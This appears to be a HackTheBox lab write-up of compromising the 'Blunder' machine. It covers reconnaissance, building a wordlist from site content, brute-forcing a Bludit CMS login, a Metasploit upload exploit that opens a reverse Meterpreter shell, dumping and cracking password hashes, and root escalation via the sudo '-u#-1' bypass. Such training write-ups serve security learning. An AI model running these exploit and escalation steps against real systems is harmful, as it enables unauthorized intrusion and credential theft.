HTB Blunder Walkthrough

Welcome to another great HackTheBox writeup, this time Andy From Italy is tackling the Blunder box.

HTB Blunder Walkthrough

Hello everyone, I am back again with another of my HackTheBox.eu writeups, it's a really nice machine. Lets jump right in!

As always I start with an Nmap scan.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder$ sudo nmap -A -T4 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 11:53 CEST
Nmap scan report for 10.10.10.191
Host is up (0.24s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Aruba Instant AP (ArubaOS 6.4.2.6) (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%), Linux 3.5 (87%), Asus RT-AC66U router (Linux 2.6) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   46.58 ms 10.10.14.1
2   46.89 ms 10.10.10.191

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.71 seconds


Despite the two ports it seems that only one is active, the HTTP on port 80, while the FTP port (21) is closed. Anyway, when I open the portal, I found an amazing surprise.


I likevStephen King, he is my favorite writer. But ignoring that for a moment I start to search for hidden folders on the portal with dirb.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder$ dirb http://10.10.10.191/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  6 12:00:34 2020
URL_BASE: http://10.10.10.191/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.191/ ----
+ http://10.10.10.191/0 (CODE:200|SIZE:8042)                                                                                                                                                             
+ http://10.10.10.191/about (CODE:200|SIZE:3281)                                                                                                                                                         
==> DIRECTORY: http://10.10.10.191/admin/                                                                                                                                                                
+ http://10.10.10.191/cgi-bin/ (CODE:301|SIZE:0)                                                                                                                                                         
+ http://10.10.10.191/LICENSE (CODE:200|SIZE:1083)                                                                                                                                                       
+ http://10.10.10.191/robots.txt (CODE:200|SIZE:22)                                                                                                                                                      
+ http://10.10.10.191/server-status (CODE:403|SIZE:277)                                                                                                                                                  
                                                                                                                                                                                                         
---- Entering directory: http://10.10.10.191/admin/ ----
+ http://10.10.10.191/admin/ajax (CODE:401|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                         
-----------------
END_TIME: Sat Jun  6 13:50:52 2020
DOWNLOADED: 9224 - FOUND: 7


Immediately I feel it's a slow portal, the dirb session was very long, but finally found what I expected, like the file robot.txt and admin section.

The BLUDIT word on the top of the form suggests me to make a search on the internet.

And immediate I check on Exploit-DB to understand if it can be some exploit available.

It seems I'm a bit lucky today. Reading the first exploit, understand that it's available on metasploit-framework, so, I launch it to understand what's is needed.

msf5 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability


msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > options 

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


Well, nothing for now, the exploit asks for credentials allowin me to upload files, I will come back to this. Coming from a regressed experience, I would like to search for files and folder on the portal, in particular for files, so I use wfuzz for better features to scan a portal.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder$ wfuzz -c --sc 200 -w /usr/share/dirb/wordlists/common.txt -w /usr/share/wfuzz/wordlist/general/extensions_common.txt -u http://10.10.10.191/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.191/FUZZFUZ2Z
Total requests: 129192

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                  
===================================================================

000007981:   200        70 L     157 W    2385 Ch     "admin - /"                                                                                                                              
000055946:   404        105 L    277 W    3143 Ch     "img2 - .asp"                                                                                                                            
Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received


The fatal error confirms that the portal is really slow, or probably there's some blocking traffic system that not allows me to perform the scan in a single session, so I have to finish this activity in multiple sessions.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder/attack$ wfuzz -c --sc 200 -w ./common.txt -w /usr/share/wfuzz/wordlist/general/extensions_common.txt -u http://10.10.10.191/FUZZFUZ2Z
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.191/FUZZFUZ2Z
Total requests: 73248

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                  
===================================================================

000001672:   200        0 L      5 W      30 Ch       "install - .php"                                                                                                                         
000002715:   404        117 L    321 W    3985 Ch     "intro - .txt"                                                                                                                           
Fatal exception: Pycurl error 28: Connection timed out after 90000 milliseconds


And again.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder/attack$ wfuzz -c --sc 200 -w ./common.txt -w /usr/share/wfuzz/wordlist/general/extensions_common.txt -u http://10.10.10.191/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.191/FUZZFUZ2Z
Total requests: 53144

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                  
===================================================================

000020131:   200        1 L      4 W      22 Ch       "robots - .txt"                                                                                                                          
000038163:   200        4 L      23 W     118 Ch      "todo - .txt"                                                                                                                            
000043386:   404        105 L    277 W    3143 Ch     "validatior - .jhtml"                                                                                                                    
Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received


I report on only the sessions that provide me with some information, but I pass most of the day scanning the portal. Then, finally, the interesting files I found are install.php and todo.txt. The install.php could be interesting for the first launch of the portal, probably at this moment the system informs me that the portal is already configured. In fact...

The todo.txt file, on the contrary, gives us additional information.

As saw, the FTP is confirmed closed and the last point suggest to us that a possible username could be "fergus". Good, but the point now is that we haven't any passwords. Reading on the forum, other guys said that "all we need is in front of us", in a short we understand that the dictionary of password for the brute-force need to be generated from the post on the portal. So, searching on the internet I found this:

5 Ways to Create Dictionary for Bruteforcing

I think that the best solution should be the cewl tool.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder/attack$ cewl -w blunder_wordlist.txt -d 2 -m 10 10.10.10.191
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder/attack$ ls -la
total 12
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Jun  7 10:57 .
drwxr-xr-x 4 in7rud3r in7rud3r 4096 Jun  6 21:50 ..
-rw-r--r-- 1 in7rud3r in7rud3r  470 Jun  7 10:57 blunder_wordlist.txt


Well, the list of passwords is not so big, just 39 records, I could force it by hand (and it be what I will do, but wait), but to improve my experience with this kind of tools, I chose to use the BurpSuite. Then, here the steps to follow to try to brute-force the login page with it.

  1. Start Burp and to the questions choose the default options.
  2. Configure the proxy listener.
    The idea of BurpSuite is to use it as a proxy, so all the request goes through this tool and it can intercept and analyze your surfing. So, you have to configure BurpSuite as a proxy on the relative session, on a specific port (8080 in my case), then go to your browser and set the proxy with 127.0.0.1 on the port you chose.
  3. On Burp ensure that "intercept is off" then go to your browser and visit the login page, when loaded come back on Burp and set "intercept is on".
  4. Now try the login with incorrect credentials and when the Burp intercept the request, right-click on it and "send to intruder"
  5. On the "position section", you can see the request, with username and password you input on the form. Burp has already identified all the fields of the form enclosing the value you pass through the char "$". Click the "Clear" button to cancel the automatic identification, select the username you input and click "Add", do the same for the password.
  6. Now choose "cluster bomb" as "attack type" and go to the "payload section".
  7. Select "1" from the option field and "Simple list" as type of data. This is the list of values for the first variable you have identified in the previous step (the username), so in the below list add "fergus" as value.
  8. Select "2" now, that is the second field, that is the password. Now choose "load" and select the dictionary you have created before.
  9. If you have done all correctly, you should be ready to start the brute-force, so, click "start attack" and cross the fingers.

It seems I'm not that lucky anymore. Well, I lose a lot of time to try and try again, but nothing. Finally, I think that, probably, the form could be using a sort of double-check or AJAX login system that, Burp can't intercept if configured as I did, so considering that, as I said before, I have only a list of 39 records, I can try it by hand. During my manual brute-force, I discovered the bad news.

Well, probably a security system for brute-forcing is turned-on the portal, I explain by myself why Burp doesn't found the right credential (probably). I should configure better BurpSuite, in order to give a wait timing between the calls, but I don't know how much time is this timing and I should configure also a delay in case this blocking IP happen, but, it's only 39 passwords, let me check manually, I should be faster. Finally, I found the right credential, fergus:RolandDeschain.

Good, now I can back to the original exploit.

msf5 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability


msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > options 

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.152:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading lLjBROcTLD.png...
[*] Uploading .htaccess...
[*] Executing lLjBROcTLD.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.152:4444 -> 10.10.10.191:34550) at 2020-06-07 15:10:41 +0200
[+] Deleted .htaccess

meterpreter > ls -la
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-06-07 15:10:55 +0200  thumbnails

meterpreter > 


Great.

meterpreter > cd /home
meterpreter > ls -la
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-26 10:29:29 +0200  hugo
40755/rwxr-xr-x  4096  dir   2020-04-28 13:13:35 +0200  shaun

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > ls -la hugo
Listing: hugo
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
20666/rw-rw-rw-   0     cha   2020-06-07 14:35:22 +0200  .bash_history
100644/rw-r--r--  220   fil   2019-11-28 10:59:55 +0100  .bash_logout
100644/rw-r--r--  3771  fil   2019-11-28 10:59:55 +0100  .bashrc
40700/rwx------   4096  dir   2020-04-27 15:29:47 +0200  .cache
40700/rwx------   4096  dir   2019-11-28 12:37:37 +0100  .config
40700/rwx------   4096  dir   2020-04-27 15:30:11 +0200  .gnupg
40775/rwxrwxr-x   4096  dir   2019-11-28 11:03:01 +0100  .local
40700/rwx------   4096  dir   2020-04-27 15:29:46 +0200  .mozilla
100644/rw-r--r--  807   fil   2019-11-28 10:59:55 +0100  .profile
40700/rwx------   4096  dir   2020-04-27 15:30:11 +0200  .ssh
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Desktop
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Documents
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Downloads
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Music
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Pictures
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Public
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Templates
40755/rwxr-xr-x   4096  dir   2019-11-28 12:36:30 +0100  Videos
100400/r--------  33    fil   2020-06-07 14:35:44 +0200  user.txt

meterpreter > ls -la shaun
Listing: shaun
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
20666/rw-rw-rw-   0     cha   2020-06-07 14:35:22 +0200  .bash_history
40755/rwxr-xr-x   4096  dir   2019-11-28 14:17:29 +0100  .cache
40755/rwxr-xr-x   4096  dir   2019-11-28 12:13:00 +0100  .config
40700/rwx------   4096  dir   2019-11-28 14:17:22 +0100  .gnupg
40755/rwxr-xr-x   4096  dir   2019-11-28 10:56:08 +0100  .local
40755/rwxr-xr-x   4096  dir   2019-11-28 12:16:07 +0100  .mozilla
40700/rwx------   4096  dir   2019-11-28 14:17:22 +0100  .ssh
100644/rw-r--r--  0     fil   2019-11-28 10:59:45 +0100  .sudo_as_admin_successful
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Desktop
40755/rwxr-xr-x   4096  dir   2020-05-19 16:14:38 +0200  Documents
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Downloads
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Music
40755/rwxr-xr-x   4096  dir   2019-11-28 15:02:17 +0100  Pictures
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Public
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Templates
40755/rwxr-xr-x   4096  dir   2019-11-28 12:11:32 +0100  Videos

meterpreter > cd hugo
meterpreter > cat user.txt
[-] core_channel_open: Operation failed: 1


Well, in this inspection I understand that there are two users on the system (and no one is fergus): hugo and shaun. The flag is under the hugo account. It's strange that I cannot launch the command whoami (I'll understand after why), anyway I have no access to the flag, probably I'm the user www-data. So, I come back on the portal and search for a credential for databases, services or something else. I found the folder "databases" under the portal and some interesting files.

meterpreter > cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}


Well, this is another point where I lost a lot of time. I tried to reverse the hash with salt, but I found a huge problem.

Finally, I come back to check for other files under the portal and I found that there's another folder portal.

meterpreter > pwd
/var/www/bludit-3.9.2/bl-content
meterpreter > cd ..
meterpreter > cd ..
meterpreter > ls -la
Listing: /var/www
=================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-19 16:13:22 +0200  bludit-3.10.0a
40775/rwxrwxr-x  4096  dir   2020-04-28 13:18:03 +0200  bludit-3.9.2
40755/rwxr-xr-x  4096  dir   2019-11-28 10:34:02 +0100  html


The portal it seems to be the same, but the new version, also if the older one is exposed.

meterpreter > cd bludit-3.10.0a
meterpreter > ls -la
Listing: /var/www/bludit-3.10.0a
================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40755/rwxr-xr-x   4096   dir   2019-10-19 10:10:46 +0200  .github
100644/rw-r--r--  582    fil   2019-10-19 10:10:46 +0200  .gitignore
100644/rw-r--r--  395    fil   2019-10-19 10:10:46 +0200  .htaccess
100644/rw-r--r--  1083   fil   2019-10-19 10:10:46 +0200  LICENSE
100644/rw-r--r--  2893   fil   2019-10-19 10:10:46 +0200  README.md
40755/rwxr-xr-x   4096   dir   2020-05-19 11:03:34 +0200  bl-content
40755/rwxr-xr-x   4096   dir   2019-10-19 10:10:46 +0200  bl-kernel
40755/rwxr-xr-x   4096   dir   2019-10-19 10:10:46 +0200  bl-languages
40755/rwxr-xr-x   4096   dir   2019-10-19 10:10:46 +0200  bl-plugins
40755/rwxr-xr-x   4096   dir   2019-10-19 10:10:46 +0200  bl-themes
100644/rw-r--r--  900    fil   2020-05-19 12:27:40 +0200  index.php
100644/rw-r--r--  20306  fil   2019-10-19 10:10:46 +0200  install.php

meterpreter > cd bl-content
meterpreter > ls -la
Listing: /var/www/bludit-3.10.0a/bl-content
===========================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-19 11:10:14 +0200  databases
40755/rwxr-xr-x  4096  dir   2020-05-19 11:03:34 +0200  pages
40755/rwxr-xr-x  4096  dir   2020-05-19 11:03:34 +0200  tmp
40755/rwxr-xr-x  4096  dir   2020-05-19 11:03:34 +0200  uploads
40755/rwxr-xr-x  4096  dir   2020-05-19 11:03:34 +0200  workspaces

meterpreter > cd databases
meterpreter > ls -la
Listing: /var/www/bludit-3.10.0a/bl-content/databases
=====================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  438    fil   2020-05-19 11:03:34 +0200  categories.php
100644/rw-r--r--  3437   fil   2020-05-19 11:03:34 +0200  pages.php
40755/rwxr-xr-x   4096   dir   2020-05-19 11:03:34 +0200  plugins
100644/rw-r--r--  42844  fil   2020-05-19 11:03:34 +0200  security.php
100644/rw-r--r--  1319   fil   2020-05-19 11:03:34 +0200  site.php
100644/rw-r--r--  2276   fil   2020-05-19 11:03:34 +0200  syslog.php
100644/rw-r--r--  52     fil   2020-05-19 11:03:34 +0200  tags.php
100644/rw-r--r--  597    fil   2020-05-19 11:10:13 +0200  users.php


But the surprise is about the users.php file.

meterpreter > cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}


Cool, here a hashing only, without salt, should be simple to recover. I try with John the Ripper, but I see that is slow and after some time, I start to search for different ways.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.191 - Blunder/attack$ john hash.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE2 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Warning: Only 2 candidates left, minimum 4 needed for performance.
Proceeding with incremental:ASCII
0g 0:00:00:13  3/3 0g/s 4841Kp/s 4841Kc/s 4841KC/s esjap..esjnd
0g 0:00:01:09  3/3 0g/s 7402Kp/s 7402Kc/s 7402KC/s swadlp4..swadlpc
0g 0:00:04:21  3/3 0g/s 5255Kp/s 5255Kc/s 5255KC/s blcka1412..blcka1414
0g 0:00:07:10  3/3 0g/s 5115Kp/s 5115Kc/s 5115KC/s 1mdwh6..1mdwnw
0g 0:00:08:40  3/3 0g/s 5176Kp/s 5176Kc/s 5176KC/s mernecom2..merneca07
Session aborted


https://md5hashing.net/hash/sha1/faca404fd5c0a31cf1897b823c695c85cffeb98d

Finally, I found it. Anyway, I have some problem with the reverse shell (remember also the whoami command?).

meterpreter > su hugo
[-] Unknown command: su.
meterpreter > sudo hugo
[-] Unknown command: sudo.


Searching I understand that I have to activate the true shell!

meterpreter > shell
Process 17357 created.
Channel 1 created.
whoami 
www-data
su hugo
Password: Password120
whoami
hugo
cat /home/hugo/user.txt
b******************************f


And I take the first flag. Well, the next flag will be really fast, nothing particular complex. Check what you can do with the hugo account.

sudo -l   
sudo: no tty present and no askpass program specified
python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
$


Something new, I never covered: "(ALL, !root) /bin/bash". Search on the internet for that and I found a lot of articles.

Exploit-DB is our best friend.

sudo 1.8.27 - Security Bypass
sudo 1.8.27 - Security Bypass. CVE-2019-14287 . local exploit for Linux platform

Well, it seems really so simple.

$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# cat /root/root.txt
cat /root/root.txt
2******************************a


And that's all folks! :)

The awesome image used in this article is called Give Em Shell and was created by Justin Mezzell.